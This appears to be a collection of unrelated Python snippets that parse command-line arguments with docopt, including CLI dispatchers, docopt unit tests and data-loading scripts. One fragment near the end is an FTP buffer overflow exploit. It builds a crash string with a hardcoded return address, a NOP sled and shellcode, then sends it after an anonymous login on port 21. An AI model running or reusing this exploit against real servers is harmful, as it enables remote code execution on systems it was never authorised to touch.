def main(argv=None): # parse the command line args = docopt(main_doc, version='clipon version %s' % __version__, options_first=True, argv=argv or sys.argv[1:]) cmd = args['<command>'] argv = [args['<command>']] + args['<options>'] if cmd == 'help': do_help(argv) return try: # parse the options for subcommand cmd_doc_name = cmd + '_doc' cmd_doc = globals()[cmd_doc_name] args = docopt(cmd_doc, argv) # call the subcommand handler method_name = 'do_' + cmd method = globals()[method_name] assert callable(method) method(args) except (KeyError, AssertionError): exit("%r is not a clipon command. See 'clipon help or clipon -h'." % cmd)
def main(argv=None, testing=False): """ Entry point """ argv = argv or sys.argv opts = docopt.docopt(__doc__, argv) if opts['-d']: pdb.set_trace() if opts['-b']: divisor = 1024 units = ['b', 'Kib', 'Mib', 'Gib', 'Tib', 'Pib', 'Eib', 'Zib', 'Yib'] else: divisor = 1000 units = ['b', 'Kb', 'Mb', 'Gb', 'Tb', 'Pb', 'Eb', 'Zb', 'Yb'] units.reverse() if len(argv) < 1: rval = usage() try: val = float(opts['NUMBER']) unit = units.pop() while divisor <= val: val /= divisor unit = units.pop() rval = "{} = {:3.2f} {}".format(opts['NUMBER'], val, unit) except ValueError: _ = docopt.docopt(__doc__, ["-x"]) # noqa: ignore=F841 if testing: return(rval) else: print(rval)
def main(): """ Create a client, parse the arguments received on the command line, and call the appropriate method on the client. """ cli = DeisClient() args = docopt(__doc__, version='Deis CLI {}'.format(__version__), options_first=True) cmd = args['<command>'] cmd, help_flag = parse_args(cmd) # print help if it was asked for if help_flag: if cmd != 'help': if cmd in dir(cli): print trim(getattr(cli, cmd).__doc__) return docopt(__doc__, argv=['--help']) # re-parse docopt with the relevant docstring if cmd in dir(cli): docstring = trim(getattr(cli, cmd).__doc__) if 'Usage: ' in docstring: args.update(docopt(docstring)) # find the method for dispatching if hasattr(cli, cmd): method = getattr(cli, cmd) else: raise DocoptExit('Found no matching command') # dispatch the CLI command try: method(args) except EnvironmentError: print 'Could not find git remote for deis' raise DocoptExit()
def load_args(args): parsed_docopt = docopt(__doc__, version='1.0') print parsed_docopt print "----------\n" if parsed_docopt['<git_cmd>'] == 'add': parsed_docopt = docopt(add_usage, parsed_docopt['--cmd_data']) print parsed_docopt
def main(): enable_pretty_logging() command = 'help' if len(sys.argv) > 1: command = sys.argv[1] if command in documentation: args = docopt(documentation[command]) else: args = docopt( documentation['help'], version='Felix Felicis v%s' % liquidluck.__version__ ) if command == 'create': creator.create(args['--settings'] or 'settings.py') elif command == 'build': arg_settings = args['--settings'] or 'settings.py' if not os.path.exists(arg_settings): answer = raw_input( "Can't find your setting files, " "would you like to create one?(Y/n) " ) if answer.lower() == 'n': return creator.create(arg_settings) else: g.detail_logging = args['--verbose'] generator.build(arg_settings) elif command == 'server': arg_settings = args['--settings'] or 'settings.py' arg_port = int(args['--port'] or 8000) if not os.path.exists(arg_settings): print('setting file not found') server.config(arg_port) server.start_server() else: generator.load_settings(arg_settings) if settings.permalink.endswith('.html'): permalink = 'html' elif settings.permalink.endswith('/'): permalink = 'slash' else: permalink = 'clean' server.config(arg_port, g.output_directory, permalink) server.start_server() elif command == 'search': arg_theme = args['<theme>'] or None arg_clean = args['--clean'] arg_force = args['--force'] theme.search(arg_theme, arg_clean, arg_force) elif command == 'install': arg_theme = args['<theme>'] or None theme.install(arg_theme) elif command == 'webhook': arg_settings = args['--settings'] or 'settings.py' arg_port = int(args['--port'] or 9000) action = (args['start'] and 'start') or (args['stop'] and 'stop') \ or (args['restart'] and 'restart') webhook.webhook(arg_port, action, arg_settings)
def main(argv=None): argv = argv if argv else [] docopt(__doc__, argv=argv) for importer, modname, is_package in pkgutil.iter_modules( snapcraft.plugins.__path__): print(modname.replace('_', '-'))
def main(argv=sys.argv): # pragma: no cover # Command is executed in the main directory of the plugin, and we must # include it in the current path for the imports to work sys.path.insert(0, '.') # ensure that argv, are unique and the same type as doc string argv = ensure_unicoded_and_unique(argv) if len(argv) > 1: application = argv[1] application_module = __import__(application) try: # by default docopt uses sys.argv[1:]; ensure correct args passed args = docopt(__doc__, argv=argv[1:], version=application_module.__version__) if argv[2] == 'help': raise DocoptExit() except DocoptExit: if argv[2] == 'help': raise args = docopt(__doc__, argv[1:3], version=application_module.__version__) args['--cms'] = '--cms' in argv for arg in argv: if arg.startswith('--extra-settings='): args['--extra-settings'] = arg.split('=')[1] if arg.startswith('--runner='): args['--runner'] = arg.split('=')[1] args['options'] = [argv[0]] + argv[2:] if args['test'] and '--native' in args['options']: args['test'] = False args['<command>'] = 'test' args['options'].remove('--native') return core(args=args, application=application) else: args = docopt(__doc__, version=__version__)
def stream_cmd(argv=sys.argv[1:]): # pragma: no cover """\ Start the streaming server, which listens to stdin, processes line by line, and returns predictions. The input should consist of a list of json objects, where each object will result in a prediction. Each line is processed in a batch. Example input (must be on a single line): [{"sepal length": 1.0, "sepal width": 1.1, "petal length": 0.7, "petal width": 5}, {"sepal length": 1.0, "sepal width": 8.0, "petal length": 1.4, "petal width": 5}] Example output: ["Iris-virginica","Iris-setosa"] An input line with the word 'exit' will quit the streaming server. Usage: pld-stream [options] Options: -h --help Show this screen. """ docopt(stream_cmd.__doc__, argv=argv) initialize_config() stream = PredictStream() stream.listen(sys.stdin, sys.stdout, sys.stderr)
def main(argv=None): import lymph.monkey lymph.monkey.patch() import docopt from lymph import __version__ as VERSION from lymph.cli.help import HELP from lymph.cli.base import get_command_class args = docopt.docopt(HELP, argv, version=VERSION, options_first=True) name = args.pop('<command>') argv = args.pop('<args>') try: command_cls = get_command_class(name) except KeyError: print("'%s' is not a valid lymph command. See 'lymph list' or 'lymph --help'." % name) return 1 command_args = docopt.docopt(command_cls.get_help(), [name] + argv) args.update(command_args) config = setup_config(args) if command_cls.needs_config else None setup_logging(args, config) if config: config.set('container.log_endpoint', zmqpub_log_handler.endpoint) terminal = setup_terminal(args, config) command = command_cls(args, config, terminal) return command.run()
def test_issue_65_evaluate_argv_when_called_not_when_imported(): import sys sys.argv = "prog -a".split() assert docopt("usage: prog [-ab]") == {"-a": True, "-b": False} sys.argv = "prog -b".split() assert docopt("usage: prog [-ab]") == {"-a": False, "-b": True}
def test_default_value_for_positional_arguments(): # disabled right now assert docopt("usage: prog [<p>]\n\n<p> [default: x]", "") == {"<p>": None} # {'<p>': 'x'} assert docopt("usage: prog [<p>]...\n\n<p> [default: x y]", "") == {"<p>": []} # {'<p>': ['x', 'y']} assert docopt("usage: prog [<p>]...\n\n<p> [default: x y]", "this") == {"<p>": ["this"]}
def main(): # Let's print help be default options = docopt(__doc__, argv=sys.argv[1:] if len(sys.argv) > 1 else ['--help'], version=fc_toolbelt.__VERSION__) available_commands = ['boilerplate', 'config', 'git', 'gitlab', 'jenkins', 'join', 'redmine', 'tickets', 'update'] command = options['<command>'] # Load fabric defaults from ~/.fabricrc state.env.update(load_settings(state._rc_path())) if True or options['--verbose']: level = logging.DEBUG if options['--verbose'] else logging.INFO logger.addHandler(logging.StreamHandler()) logger.setLevel(level) else: state.output['commands'] = False state.env.output_prefix = False if options['<command>'] in available_commands: subcommand = globals()[command] options = docopt(subcommand.__doc__, argv=sys.argv[1:]) exit(subcommand(options)) elif options['<command>'] == 'help': if not options['<args>']: exit(__doc__) help_command = options['<args>'][0] if help_command in available_commands: exit(textwrap.dedent(globals()[help_command].__doc__)) exit("%r is not a fct command. See 'fct --help'." % command)
def test_command(self): doc = """Usage: command foo""" config = _fake_config with raises(DocoptExit): args = docopt(str(doc)) class SmallCommand(Command): def __init__(self, config, args): self.config = config self.args = args self.manager = _manager(token=config['api_token']) def foo(self): print("foo-answer") def bar(self): print("bar-answer") with capture_stdout() as capture: output = SmallCommand(config, docopt(str(doc), argv=['foo'])).run() assert capture.result == "foo-answer\n" with capture_stdout() as capture: output = SmallCommand(config, []).run("bar") assert capture.result == "bar-answer\n"
def run(self, argv=sys.argv): """ usage: pwhash-config [-hv] <command> [<args>...] pwhash-config (-h | --help) pwhash-config (-v | --version) options: -h, --help Shows this text -v, --version Shows the version number. commands: create Create pwhash application configuration compile Compile application configuration for deployment upgrade Upgraded pwhash application configuration """ arguments = docopt( textwrap.dedent(self.run.__doc__), argv=argv[1:], options_first=True, version=textwrap.dedent( u"""\ pwhash version: %s application config version: %d deployment config version: %d""" ) % (__version__, APPLICATION_VERSION, DEPLOYMENT_VERSION), ) command_arguments = [arguments["<command>"]] + arguments["<args>"] command = self.commands.get(arguments["<command>"]) if command is None: self.fail(u"%r is not a pwhash-config command" % arguments["<command>"]) else: command(docopt(textwrap.dedent(command.__doc__), argv=command_arguments))
def main(argv=sys.argv): # pragma: no cover # Command is executed in the main directory of the plugin, and we must # include it in the current path for the imports to work sys.path.insert(0, '.') if len(argv) > 1: application = argv[1] application_module = import_module(application) try: args = docopt(__doc__, version=application_module.__version__) if argv[2] == 'help': raise DocoptExit() except DocoptExit: if argv[2] == 'help': raise args = docopt(__doc__, argv[1:3], version=application_module.__version__) args['--cms'] = '--cms' in argv for arg in argv: if arg.startswith('--extra-settings'): args['--extra-settings'] = arg.split('=')[1] args['options'] = [argv[0]] + argv[2:] if args['test'] and '--native' in args['options']: args['test'] = False args['<command>'] = 'test' args['options'].remove('--native') core(args=args, application=application) else: args = docopt(__doc__, version=__version__)
def main(): commands = load_commands() args = docopt(root_doc(), version='dokku-client version %s' % __version__, options_first=True) command_name = args['<command>'] or 'help' if command_name == 'version': # docopt will handle version printing for us if use '--version' exit(call(['dokku-client', '--version'])) # Get the command object for the specified command name command = command_by_name(command_name, commands) if not command: sys.stderr.write("Unknown command. Use 'dokku-client help' for list of commands.\n") exit(1) else: # Use docopt to parse the options based upon the class' doc string command_args = docopt(command.doc) # Load default values from the users' environment command_args = apply_defaults(command_args) if command.check_config: # Sanity check the config if not command_args.get('--host', None): sys.stderr.write("Could not determine host. Specify --host or set DOKKU_HOST.\n") exit(1) if not command_args.get('--app', None): sys.stderr.write("Could not determine app. Specify --app or set DOKKU_APP.\n") exit(1) # Ok, let's run the command command.args = command_args command.main()
def test_allow_double_dash(): assert docopt('usage: prog [-o] [--] <arg>\nkptions: -o', '-- -o') == {'-o': False, '<arg>': '-o', '--': True} assert docopt('usage: prog [-o] [--] <arg>\nkptions: -o', '-o 1') == {'-o': True, '<arg>': '1', '--': False} with raises(DocoptExit): # "--" is not allowed; FIXME? docopt('usage: prog [-o] <arg>\noptions:-o', '-- -o')
def test_docopt(): doc = '''Usage: prog [-v] A -v Be verbose.''' assert docopt(doc, 'arg') == {'-v': False, 'A': 'arg'} assert docopt(doc, '-v arg') == {'-v': True, 'A': 'arg'} doc = """Usage: prog [-vqr] [FILE] prog INPUT OUTPUT prog --help Options: -v print status messages -q report only file names -r show all occurrences of the same error --help """ a = docopt(doc, '-v file.py') assert a == {'-v': True, '-q': False, '-r': False, '--help': False, 'FILE': 'file.py', 'INPUT': None, 'OUTPUT': None} a = docopt(doc, '-v') assert a == {'-v': True, '-q': False, '-r': False, '--help': False, 'FILE': None, 'INPUT': None, 'OUTPUT': None} with raises(DocoptExit): # does not match docopt(doc, '-v input.py output.py') with raises(DocoptExit): docopt(doc, '--fake') with raises(SystemExit): docopt(doc, '--hel')
def main(): """CLI entrypoint, handles subcommand parsing""" args = docopt(__doc__, version='dfm version 7.2.0', options_first=True) if not args['<command>']: print(__doc__) sys.exit(1) if args['--debug']: logging.basicConfig(level=logging.DEBUG) elif args['--verbose']: logging.basicConfig(level=logging.INFO) command = args['<command>'] try: if command == 'help': if args['<args>']: help_cmd = ALIASES.get(args['<args>'][0], args['<args>'][0]) command_mod = import_module('dfm.cli.{}_cmd'.format(help_cmd)) print(command_mod.__doc__) else: print(__doc__) sys.exit(0) command = ALIASES.get(command, command) command_mod = import_module('dfm.cli.{}_cmd'.format(command)) argv = [command] + args['<args>'] command_mod.run(docopt(command_mod.__doc__, argv=argv)) sys.exit(0) except ImportError: print('{} is not a known dfm command.'.format(command)) sys.exit(1)
def test_allow_double_underscore(): assert docopt('usage: prog [-o] [--] <arg>\n\n-o', '-- -o') == {'-o': False, '<arg>': '-o', '--': True} assert docopt('usage: prog [-o] [--] <arg>\n\n-o', '-o 1') == {'-o': True, '<arg>': '1', '--': False} with raises(DocoptExit): docopt('usage: prog [-o] <arg>\n\n-o', '-- -o') # '--' not allowed
def test_show(self): args = docopt(doc, ['show']) self.assertEqual(args['show'], True) self.assertEqual(args['--f'], False) args = docopt(doc, ['show', '--f']) self.assertEqual(args['show'], True) self.assertEqual(args['--f'], True)
def main(): import sys from textwrap import dedent from docopt import docopt args = docopt(__doc__, version=__version__, options_first=True) rootdir = '.' if args['--dir']: rootdir = args['--dir'] command = args['<command>'] if command == 'help': command = args['<args>'] args['<args>'] = '--help' try: repostack = RepoStack(rootdir=rootdir) if hasattr(repostack, command): cmd = getattr(repostack, command) cmd(docopt( dedent(cmd.__doc__), options_first=True, argv=[command] + args['<args>'])) else: sys.exit('\n'.join(( __doc__, 'Error: unknown command "%s".' % command))) except Exception, e: print e raise
def test_options_first(): assert docopt("usage: prog [--opt] [<args>...]", "--opt this that") == {"--opt": True, "<args>": ["this", "that"]} assert docopt("usage: prog [--opt] [<args>...]", "this that --opt") == {"--opt": True, "<args>": ["this", "that"]} assert docopt("usage: prog [--opt] [<args>...]", "this that --opt", options_first=True) == { "--opt": False, "<args>": ["this", "that", "--opt"], }
def main(argv=None): if argv is None: argv = sys.argv[1:] configuration = docopt.docopt( OPTIONS, argv=argv, options_first=True, version='cosmic-ray v.2') if configuration['--verbose']: logging.basicConfig(level=logging.INFO) argv.remove('--verbose') command = configuration['<command>'] if command is None: command == 'help' try: handler = COMMAND_HANDLER_MAP[command] except KeyError: LOG.error('"{}" is not a valid cosmic-ray command'.format(command)) handler = handle_help argv = ['help'] sub_config = docopt.docopt( handler.__doc__, argv, version='cosmic-ray v.2') sys.exit(handler(sub_config))
def parse(self, argv=None): """ Read the array of command line arguments and determine if the user is requesting info about the pipeline or just wants to run the pipeline or wants to do something else. """ argv = argv if argv else sys.argv[1:] try: args = docopt(self.usage_string, argv=argv) if args["run"] and args["<pipeline.json>"]: # user requests info about the pipeline print self._make_pipeline_usage_string(args["<pipeline.json>"]) except DocoptExit as e: # user is attempting to run the pipeline if len(argv) > 2 and argv[0] == "run": args = docopt(self._make_pipeline_usage_string(argv[1]), argv=argv) inputs = {} for i in args: if i.startswith('--'): inputs[i[2:]] = args[i] graph = JobGraph.from_pipeline(self._load_pipeline(argv[1])) try: graph.simple_run(RUNNER_MAP, inputs, before_job=before_job, after_job=after_job) except RunFailed, e: print 'Failed: %s' % e raise e finally: present_outputs(graph.get_outputs())
def main(): args = docopt.docopt(__doc__, version=getversion(), options_first=True) command = args['<command>'] argv = [command] + args['<args>'] commandfunc = getattr(sys.modules[__name__], command.replace('-', '_'), None) if not hasattr(commandfunc, 'iscommand'): exit("no such command, see 'dominator help'.") else: loglevel = getattr(logging, args['--loglevel'].upper()) logging.basicConfig(level=loglevel) settings.load(args['--settings']) if args['--namespace']: settings['docker-namespace'] = args['--namespace'] logging.config.dictConfig(settings.get('logging', {})) logging.disable(level=loglevel-1) try: if args['--config'] is not None: containers = load_yaml(args['--config']) else: containers = load_module(args['--module'], args['--function']) except: getlogger().exception("failed to load config") return commandargs = docopt.docopt(commandfunc.__doc__, argv=argv) def pythonize_arg(arg): return arg.replace('--', '').replace('<', '').replace('>', '') try: commandfunc(containers, **{pythonize_arg(k): v for k, v in commandargs.items() if k not in ['--help', command]}) except: getlogger(command=command).exception("failed to execute command") return
def main(): """ Main function """ try: name = indexfile.__name__ version = indexfile.__version__ log = indexfile.getLogger(__name__) # local variables index = None # load commands commands = load_commands() helpstr = __doc__ % (name, name) + get_commands_help(commands) # create validation schema sch = Schema({ 'index': Or(None, And(Or('-', 'stdin'), Use(lambda x: sys.stdin)), open), Optional('format'): open, Optional('loglevel'): And(str, Use(str.lower), Or('error', 'warn', 'info', 'debug')), '<command>': Command(commands=commands), str: object }) # parse args and remove dashes args = docopt(helpstr, version="%s v%s" % (name, version), options_first=True) args = dict([(k.replace('-', ''), v) for k, v in args.iteritems()]) # validate args args = sch.validate(args) # deal with 'help' command if args.get('<command>') == 'help': docopt(helpstr, version="%s v%s" % (name, version), argv=['--help']) # load the index and delegate command config = load_config(os.getcwd(), args) indexfile.setLogLevel(config.get('loglevel')) index = open_index(config) command_ = get_command(args.get('<command>'), commands) argv = [name, command_] + args['<args>'] sys.argv = argv module_ = "indexfile.cli.indexfile_%s" % command_ runpy.run_module(module_, run_name="__main__", init_globals={'index': index, 'command': '{0} {1}'.format(name, command_)}) except KeyboardInterrupt, e: sys.exit(1)
def main(): # parse command command_log = 'CIRCexplorer parameters: ' + ' '.join(sys.argv) if len(sys.argv) == 1: sys.exit(help_doc) elif sys.argv[1] == '--version' or sys.argv[1] == '-v': sys.exit(__version__) elif sys.argv[1] == 'align': from . import align align.align(docopt(align.__doc__, version=__version__), command=command_log, name='align') elif sys.argv[1] == 'parse': from . import parse parse.parse(docopt(parse.__doc__, version=__version__), command=command_log, name='parse') elif sys.argv[1] == 'annotate': from . import annotate annotate.annotate(docopt(annotate.__doc__, version=__version__), command=command_log, name='annotate') elif sys.argv[1] == 'assemble': from . import assemble assemble.assemble(docopt(assemble.__doc__, version=__version__), command=command_log, name='assemble') elif sys.argv[1] == 'denovo': from . import denovo denovo.denovo(docopt(denovo.__doc__, version=__version__), command=command_log, name='denovo') else: sys.exit(help_doc)
def main(argv=None): """Forget credentials for Ubuntu One SSO.""" argv = argv if argv else [] docopt(__doc__, argv=argv) logger.info('Clearing credentials for Ubuntu One SSO.') clear_config() logger.info('Credentials cleared.')
def test_any_options(): doc = '''Usage: prog [options] A -q Be quiet -v Be verbose.''' assert docopt(doc, 'arg') == {'A': 'arg', '-v': False, '-q': False} assert docopt(doc, '-v arg') == {'A': 'arg', '-v': True, '-q': False} assert docopt(doc, '-q arg') == {'A': 'arg', '-v': False, '-q': True}
"""Compressor. Usage: compressor.py compress <read_file> [-o <write_file>] [--lzw|--elias [--divergence <divergence>|--code <code>]] compressor.py decompress <read_file> [-o <write_file>] (--lzw|--elias --code <code>) Options: --help Show this screen. --version Show version. -o Specify output file. --lzw Use lzw algorithm. --elias Use elias codes. -d --divergence=<divergence> Specify characters distribution divergence. --code=<code> Specify elias code type. --hp Use hyper-threading for high performance. """ from docopt import docopt import execution if __name__ == '__main__': arguments = docopt(__doc__, version='Compressor 1.0') print(arguments) try: execution.execute(arguments) except Exception as e: print(e.args)
def get_files(path, extension='.wav') : filenames = [] for filename in glob.iglob(f'{path}/**/*{extension}', recursive=True): filenames += [filename] return filenames def convert_file(path): wav = dsp.load_wav(path, encode=False) mel = dsp.melspectrogram(wav) quant = (wav + 1.) * (2**hparams.bits - 1) / 2 return mel.astype(np.float32), quant.astype(np.int) if __name__ == "__main__": args = docopt(__doc__) in_dir = args["<in_dir>"] out_dir = args["<out_dir>"] num_workers = args["--num_workers"] num_workers = cpu_count() if num_workers is None else int(num_workers) preset = args["--preset"] if preset is not None: with open(preset) as f: hparams.parse_json(f.read()) # Override hyper parameters hparams.parse(args["--hparams"]) assert hparams.name == "WaveRNN" dsp = DSP(hparams) quant_path = os.path.join(out_dir, 'quant/')
def main(): args = docopt(__doc__) if args['--version']: print(_gen_version()) sys.exit(0) if args['--debug']: args['--verbose'] = True logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] %(name)s: %(message)s') _LOGGER.debug('running %s', _gen_version()) elif args['--verbose']: logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s') else: logging.basicConfig(level=logging.WARNING, format='%(levelname)s: %(message)s') sys.tracebacklimit = 0 opts = _make_opts(args) filter_count = sum(1 for opt in opts if opt in _FILTER_OPTIONS) device_id = None if not args['--device']: selected = list(find_liquidctl_devices(**opts)) else: device_id = int(args['--device']) no_filters = { opt: val for opt, val in opts.items() if opt not in _FILTER_OPTIONS } compat = list(find_liquidctl_devices(**no_filters)) if device_id < 0 or device_id >= len(compat): raise SystemExit('Error: device ID out of bounds') if filter_count: # check that --device matches other filter criteria matched_devs = [ dev.device for dev in find_liquidctl_devices(**opts) ] if compat[device_id].device not in matched_devs: raise SystemExit( 'Error: device ID does not match remaining selection criteria' ) _LOGGER.warning( 'mixing --device <id> with other filters is not recommended; ' 'to disambiguate between results prefer --pick <result>') selected = [compat[device_id]] if args['list']: _list_devices(selected, using_filters=bool(filter_count), device_id=device_id, **opts) return if len(selected) > 1 and not (args['status'] or args['all']): raise SystemExit( 'Error: too many devices, filter or select one (see: liquidctl --help)' ) elif len(selected) == 0: raise SystemExit( 'Error: no devices matches available drivers and selection criteria' ) errors = 0 def log_error(err, msg, *args): nonlocal errors errors += 1 _LOGGER.info('%s', err, exc_info=True) _LOGGER.error(msg, *args) for dev in selected: _LOGGER.debug('device: %s', dev.description) try: dev.connect(**opts) if args['initialize']: _print_dev_status(dev, dev.initialize(**opts)) elif args['status']: _print_dev_status(dev, dev.get_status(**opts)) elif args['set'] and args['speed']: _device_set_speed(dev, args, **opts) elif args['set'] and args['color']: _device_set_color(dev, args, **opts) else: raise Exception('Not sure what to do') except OSError as err: # each backend API returns a different subtype of OSError (OSError, # usb.core.USBError or PermissionError) for permission issues if err.errno in [errno.EACCES, errno.EPERM]: log_error( err, f'Error: insufficient permissions to access {dev.description}' ) elif err.args == ('open failed', ): log_error( err, f'Error: could not open {dev.description}, possibly due to insufficient permissions' ) else: log_error( err, f'Unexpected OS error with {dev.description}: {err}') except NotSupportedByDevice as err: log_error(err, f'Error: operation not supported by {dev.description}') except NotSupportedByDriver as err: log_error( err, f'Error: operation not supported by driver for {dev.description}' ) except UnsafeFeaturesNotEnabled as err: features = ','.join(err.args) log_error( err, f'Error: missing --unsafe features for {dev.description}: {features!r}' ) _LOGGER.error( 'More information is provided in the corresponding device guide' ) except Exception as err: log_error(err, f'Unexpected error with {dev.description}: {err}') finally: dev.disconnect(**opts) if errors: sys.exit(errors)
Options: --help Shows this help message. """ from __future__ import print_function from __future__ import absolute_import from __future__ import unicode_literals from docopt import docopt import struct import ctypes from newton_control_main import newton as newton if __name__ == "__main__": args = docopt(__doc__, version='0.1') address = int( args['<address>'], 16 ) write_data = int( args['<write_data>'], 16 ) rc = newton.adi_newton_config( 0 ) if rc != 0: print( "ERROR: newton.adi_newton_config return an error (" + str( rc ) + ")." ) sys.exit( rc ) newton.adi_write_register( address, write_data ) read_data = newton.adi_read_register_py( address ) if read_data != write_data: print( "ERROR: miscompare: actual = " + hex( read_data ) + " , expected = " + hex ( write_data ) )
if not root_or_admin: if sys.platform == 'win32': print('Error: Must run this with administrative privileges to set MAC addresses') return NON_ROOT_USER else: print('Error: Must run this as root (or with sudo) to set MAC addresses') return NON_ROOT_USER set_interface_mac(device, target_mac, port) elif args['normalize']: print(normalize_mac_address(args['<mac>'])) else: print('Error: Invalid arguments - check help usage') return INVALID_ARGS del spoofer return SUCCESS if __name__ == '__main__': arguments = docopt(__doc__, version=1.0) try: root_or_admin = os.geteuid() == 0 except AttributeError: root_or_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 sys.exit(main(arguments, root_or_admin))
'groupid': row[0], 'taxid': taxid }) if rv: hom_ct += 1 else: dba_err_ct += 1 pbar.finish() print "Processed {} lines.".format(ct) print "Loaded {} new homologene rows".format(hom_ct) print " Skipped {} non-Human/Mouse/Rat lines".format(skip_ct) if nf_ct > 0: print "WARNNING: No target/nhprotein found for {} lines. See logfile {} for details.".format( nf_ct, logfile) if dba_err_ct > 0: print "WARNNING: {} DB errors occurred. See logfile {} for details.".format( dba_err_ct, logfile) if __name__ == '__main__': print "\n{} (v{}) [{}]:".format(PROGRAM, __version__, time.strftime("%c")) args = docopt(__doc__, version=__version__) if args['--debug']: print "\n[*DEBUG*] ARGS:\n%s\n" % repr(args) start_time = time.time() download(args) load(args) elapsed = time.time() - start_time print "\n{}: Done. Elapsed time: {}\n".format(PROGRAM, slmf.secs2str(elapsed))
from docopt import docopt from openeye.oechem import * from openeye.oeomega import * from openeye.oequacpac import * from tqdm import tqdm cmd_str = """Usage: gen_restricted_confs.py --smi SMILES_FILE --fix FIX_FILE --out OUTPUT_FILE Options: --smi SMILES_FILE input SMILES file name --fix FIX_FILE file_with_fixed piece of the molecule --out OUTPUT_FILE output file name """ cmd_input = docopt(cmd_str) smiles_file_name = cmd_input.get("--smi") fix_file_name = cmd_input.get("--fix") output_file_name = cmd_input.get("--out") fix_mol = OEGraphMol() fix_fs = oemolistream(fix_file_name) OEReadMolecule(fix_fs, fix_mol) # Relatively quick way to get the number of molecules moldb = oechem.OEMolDatabase() moldb.Open(smiles_file_name) num_mols = moldb.NumMols() omegaOpts = OEOmegaOptions() omegaOpts.SetFixMol(fix_mol)
ret = struct.pack('<L', 0x7C874413) padding = "\x90" * 150 crash = "\x41" * 246 + ret + padding + shellcode print "[+] Connecting to " + target s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, 21)) except: print Fore.RED + "[-] Connection to " + target + " failed!" + Fore.RESET sys.exit(0) print "[+] Attempting anonymous login" s.send("USER anonymous\r\n") s.recv(1024) s.send("PASS \r\n") s.recv(1024) print "[+] Sending " + 'len(crash)' + " " + command + " byte crash..." s.send(command + " " + crash + "\r\n") time.sleep(4) print Fore.GREEN + "[*] Command sent!" + Fore.RESET if __name__ == '__main__': init() arguments = docopt(__doc__, version=0.1) main(arguments)
'''rHockey Ticker Usage: rHockey.py [--limit=<number>] [--delay=<minutes>] rHockey.py feed <name> [--limit=<number>] [--delay=<minutes>] Options: -h --help Show this screen. --limit=<number> Limit for submission downloads --delay=<minutes> Delay to wait between downloads in minutes ''' import ticker from docopt import docopt if __name__ == '__main__': #import ipdb; ipdb.set_trace() arguments = docopt(__doc__, version=u'rHockey Ticker 0.1') feed = arguments['<name>'] or u'new' delay = int(arguments['--delay'] or 5) limit = int(arguments['--limit'] or 5) ticker.ticker_runner('hockey', feed, delay=delay, limit=limit)
def main(): """entry point""" ret = True args = docopt(USAGE, version=VERSION) try: conf = Cfg(os.path.expanduser(args['--cfg'])) except ValueError as e: LOG.err('error: {}'.format(str(e))) return False opts = conf.get_settings() opts['dry'] = args['--dry'] opts['profile'] = args['--profile'] opts['safe'] = not args['--force'] opts['installdiff'] = not args['--nodiff'] opts['link'] = args['--link'] opts['debug'] = args['--verbose'] LOG.debug = opts['debug'] LOG.dbg('config file: {}'.format(args['--cfg'])) LOG.dbg('opts: {}'.format(opts)) if opts['banner'] and not args['--no-banner']: header() try: if args['list']: # list existing profiles list_profiles(conf) elif args['listfiles']: # list files for selected profile list_files(opts, conf) elif args['install']: # install the dotfiles stored in dotdrop ret = install(opts, conf) elif args['compare']: # compare local dotfiles with dotfiles stored in dotdrop tmp = get_tmpdir() opts['dopts'] = args['--dopts'] ret = compare(opts, conf, tmp, args['--files']) if os.listdir(tmp): LOG.raw('\ntemporary files available under {}'.format(tmp)) else: os.rmdir(tmp) elif args['import']: # import dotfile(s) importer(opts, conf, args['<paths>']) elif args['update']: # update a dotfile update(opts, conf, args['<path>']) except KeyboardInterrupt: LOG.err('interrupted') ret = False return ret
import sys import os from docopt import docopt doc = """ Usage: emotions <pred_file> [-s=<video_source>] [-o=<output_video>] [-l=<labeled_video>] [-w=<window_title>] Options: -s <video_source> video file source [default: 0] -o <output_video> output video file name without file extension (file will be saved as .avi) -l <labeled-video> labeled output video file name without file extension (file will be saved as .avi) -w <window_title> title of window [default: "camera"] """ args = docopt(doc=doc, argv=sys.argv[1:]) WINDOW_NAME = args['-w'] or "camera" PRED_FILE = args['<pred_file>'] VIDEO_SOURCE = args['-s'] if str.isdigit(VIDEO_SOURCE): VIDEO_SOURCE = int(VIDEO_SOURCE) else: if not os.path.isfile(VIDEO_SOURCE): print("video source file '{}' does not exist.".format(VIDEO_SOURCE)) exit() OUTPUT_VIDEO_FILE = args['-o'] LABELED_VIDEO_FILE = args['-l']
def main(debug=None): args = docopt(__doc__, version='VCF-Toolbox v0.1', argv=debug, options_first=False) module_path = os.path.split(os.path.realpath(__file__))[0] handle = open(args["<seq>"], "rb") reference = resolve_reference_genome(args["--ref"]) if args["<vcf>"]: concordance = True v = vcf(args["<vcf>"]) samples = v.samples if args["--vcf-sites"] and args["<vcf>"] is None: with indent(4): exit( puts_err( colored.red("\nMust specify <vcf> with --vcf-sites\n"))) # Setup reference for blast call b = blast(reference) # Set file type: sequence_file_type = seq_type(args["<seq>"]) # Output header print("\t".join(blast_variant.output_order)) for record in SeqIO.parse(handle, sequence_file_type): # Resolve sample within fasta line sample = resolve_sample_from_line(samples, handle.name) if not sample: sample = resolve_sample_from_line(samples, record.name) blast_results = b.blast_call(record) classification = "" for n, variant in enumerate(blast_results): output_line = False if variant is None: puts_err( colored.red("No Results for " + sample + " " + record.description)) continue if args["<vcf>"]: if n == 0: vcf_variants = [] for vcf_variant in v(variant.region()): if sample: gt = format_gt( vcf_variant.gt_bases[v.samples.index(sample)]) vcf_variants.append([ vcf_variant.CHROM, vcf_variant.POS, gt, vcf_variant.REF, vcf_variant.ALT ]) vcf_variant_positions = [ x[0:2] for x in vcf_variants ] chrom_pos = variant.chrom_pos_allele()[0:2] vcf_variant_match = [ x for x in vcf_variants if x[0:2] == chrom_pos ] if vcf_variant_match: vcf_variant_match = vcf_variant_match[0] variant.vcf_gt = vcf_variant_match[2] variant.REF = vcf_variant_match[3] variant.ALT = ','.join(vcf_variant_match[4]) variant.fetch_variant_type() if variant.REF == variant.seq_gt and variant.seq_gt == variant.vcf_gt: variant.classification = "TN" elif variant.REF != variant.seq_gt and variant.seq_gt == variant.vcf_gt: variant.classification = "TP" elif variant.REF == variant.seq_gt and variant.seq_gt != variant.vcf_gt: variant.classification = "FP" elif variant.REF != variant.seq_gt and variant.seq_gt != variant.vcf_gt: 